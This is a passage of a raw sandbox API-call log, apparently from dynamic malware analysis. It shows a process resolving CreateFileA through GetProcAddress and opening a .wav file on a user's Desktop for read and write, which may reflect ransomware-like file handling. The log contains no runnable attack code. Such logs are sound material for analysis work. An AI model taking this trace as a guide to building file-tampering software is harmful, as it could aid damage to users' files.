[0161.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0161.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0161.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0161.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0161.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0161.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0161.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0161.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0161.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0161.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0161.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0161.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0161.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0161.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0161.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0161.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0161.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0161.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0161.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0161.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0161.268] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0161.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0161.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0161.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0161.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0161.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0161.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0161.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0161.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0161.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0161.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0161.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0161.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0161.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0161.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0161.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0161.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0161.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0161.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0161.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0161.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0161.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0161.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0161.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0161.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0161.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0161.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0161.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0161.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0161.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0161.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0161.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0161.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0161.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0161.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0161.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0161.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0161.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0161.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0161.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0161.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0161.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0161.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0161.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0161.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0161.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0161.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0161.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0161.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.271] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0161.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0161.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd618 [0161.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd618, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0161.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0161.271] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0161.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0161.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0161.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0161.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0161.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0161.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd618 [0161.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd618, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0161.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0161.272] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0161.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0161.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0161.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0161.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0161.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0161.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0161.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0161.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0161.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0161.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xa6d008 [0161.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0161.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3a) returned 0x8db0a8 [0161.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav", cchWideChar=58, lpMultiByteStr=0x8db0a8, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav", lpUsedDefaultChar=0x0) returned 58 [0161.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0161.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0161.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0161.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0161.273] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gjmnmjqzifmsie_.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0161.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0161.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0161.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0161.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0161.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0161.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0161.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0161.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0161.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0161.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0161.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0161.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0161.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa6d008, cbMultiByte=58, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0161.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x74) returned 0x8afe68 [0161.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa6d008, cbMultiByte=58, lpWideCharStr=0x8afe68, cchWideChar=58 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav") returned 58 [0161.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0161.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0161.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8afe68 | out: hHeap=0x8a0000) returned 1 [0161.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6d008 | out: hHeap=0x8a0000) returned 1 [0161.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0161.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0161.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0161.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0161.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0161.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0161.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0161.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0161.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0161.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0161.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0161.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0161.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0161.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0161.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0161.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0161.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0161.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0161.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0161.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0161.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0161.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0161.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0161.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.275] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0161.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.275] HeapFree (in: 